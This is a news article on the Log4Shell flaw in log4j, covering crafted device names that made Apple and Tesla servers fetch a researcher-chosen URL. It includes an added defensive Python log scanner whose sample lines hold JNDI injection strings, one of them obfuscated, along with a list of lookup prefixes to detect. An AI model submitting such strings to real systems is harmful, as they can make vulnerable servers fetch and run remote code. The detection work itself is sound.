Researchers investigating the recently discovered and “very bad” Log4Shell exploit claim to have used it on devices ranging from iPhones to Tesla cars. According to shared screenshots, simply changing the device name of an iPhone or Tesla to a crafted string is enough to trigger a ping from Apple or Tesla servers, indicating that the server on the other end is vulnerable to Log4Shell.
In the demonstrations, the researchers changed the device names to a string of characters that would send servers to a test URL, exploiting the behavior caused by the vulnerability. After the name was changed, incoming traffic showed URL requests from IP addresses owned by Apple and, in the case of Tesla, China Unicom, the company’s mobile service partner in China. In short, the researchers tricked Apple and Tesla servers into visiting a URL of their choosing.
The iPhone screenshot came from a Dutch security researcher; the second was posted to the Log4jAttackSurface GitHub repository. Assuming the images are genuine, they show behavior (the fetching of remote resources) that should never be triggered by the text contained in a device name. Evidence of this has led to widespread speculation that Apple and Tesla are vulnerable to the exploit.
While the exposure is alarming, it does not indicate how useful it will be to cybercriminals. In theory, an attacker could host malicious code at the target URL in order to infect vulnerable servers, but a well-maintained network can block such an attack at the network level. More broadly, there is no indication that the approach could lead to any further compromise of Apple’s or Tesla’s systems. (Neither company responded to an email request for comment by publication time.)
However, it is a reminder of the complex nature of technology systems, which almost always depend on code imported from third-party libraries. Log4Shell exploits log4j, an open-source Java library that is widely used for application logging. Although the exact number of affected devices is not known, researchers estimate it is in the millions, including obscure programs that are rarely targeted by attacks of this nature.
The full extent of exploitation in the wild is unknown, but in a blog post, researchers at the security platform Cado reported finding servers attempting to use this method to install Mirai botnet code.
Log4Shell is even more significant for being easy to exploit. The vulnerability works by tricking an application into interpreting a piece of text as a link to a remote resource, and into trying to retrieve that resource instead of saving the text as it is written. All that is required is for the vulnerable device to save the crafted string of characters in its application logs.
This creates the potential for vulnerabilities in many systems that accept user input, because submitted text can end up stored in logs. Log4j vulnerabilities were first seen in Minecraft servers, which attackers could compromise using chat messages; systems that send and receive other publicly accessible message formats, such as SMS, are also vulnerable.
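The mechanism above, logged text that log4j treats as a lookup to resolve, is also what a defender can look for in the logs of any service that records user-supplied fields. As an added example (not code from the article or from any of the companies it mentions), the script below scans a constructed device check-in log, with a hypothetical `device_name` field, and flags entries that contain log4j lookup syntax; it tracks brace depth so a lookup nested inside another lookup is caught as one unit rather than missed by a plain substring check.

```python
import re

# Lookup prefixes log4j resolves inside logged text; "jndi" is the Log4Shell one,
# the rest are listed because a nested lookup can be used to assemble it.
LOOKUP_PREFIXES = {"jndi", "lower", "upper", "env", "sys", "date", "ctx", "main"}
DEVICE_NAME = re.compile(r'device_name="((?:[^"\\]|\\.)*)"')

# Constructed sample check-in log (not real Apple or Tesla data); device_name is
# user-controlled text, the same path the article describes.
LOG_LINES = [
    '2021-12-10T09:14:02Z src=203.0.113.7 device_name="Alice\'s iPhone"',
    '2021-12-10T09:14:05Z src=203.0.113.9 device_name="${jndi:ldap://example.invalid/a}"',
    '2021-12-10T09:14:08Z src=203.0.113.11 device_name="${${lower:j}ndi:ldap://example.invalid/b}"',
    '2021-12-10T09:14:11Z src=203.0.113.12 device_name="Budget ${amount} phone"',
]

def extract_lookups(text):
    """Return each balanced ${...} expression in text, outermost first;
    brace depth is tracked so a nested lookup is captured whole."""
    found, depth, start, i = [], 0, 0, 0
    while i < len(text):
        if text.startswith("${", i):
            if depth == 0:
                start = i
            depth += 1
            i += 2
            continue
        if text[i] == "}" and depth > 0:
            depth -= 1
            if depth == 0:
                found.append(text[start:i + 1])
        i += 1
    return found

def is_suspicious(text):
    """True if text holds a lookup that log4j would try to resolve."""
    for expr in extract_lookups(text):
        inner = expr[2:-1].lower()
        # prefix built from another lookup, or a known resolvable prefix
        if inner.startswith("${") or inner.split(":", 1)[0] in LOOKUP_PREFIXES:
            return True
    return False

def scan_log_lines(lines):
    """Return (1-based line number, device name) for each flagged entry."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = DEVICE_NAME.search(line)
        if m and is_suspicious(m.group(1)):
            hits.append((n, m.group(1)))
    return hits
```

A hit means the string reached the log, not that the lookup was resolved; whether the server actually made the outbound request depends on the log4j version in use, which is why patching the library remains the fix.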
At least one major SMS provider appears to be vulnerable to the exploit, according to a test conducted by The Verge. When sent to numbers operated by the SMS provider, text messages containing malicious code triggered a response from company servers revealing information about the IP address and host name, suggesting that the servers could be coerced into running malicious code. The company had not responded to calls and emails at the time of publication. An update to the log4j library has been released to address the vulnerability, but patching every vulnerable device will take time given the challenges of industry-wide software updates.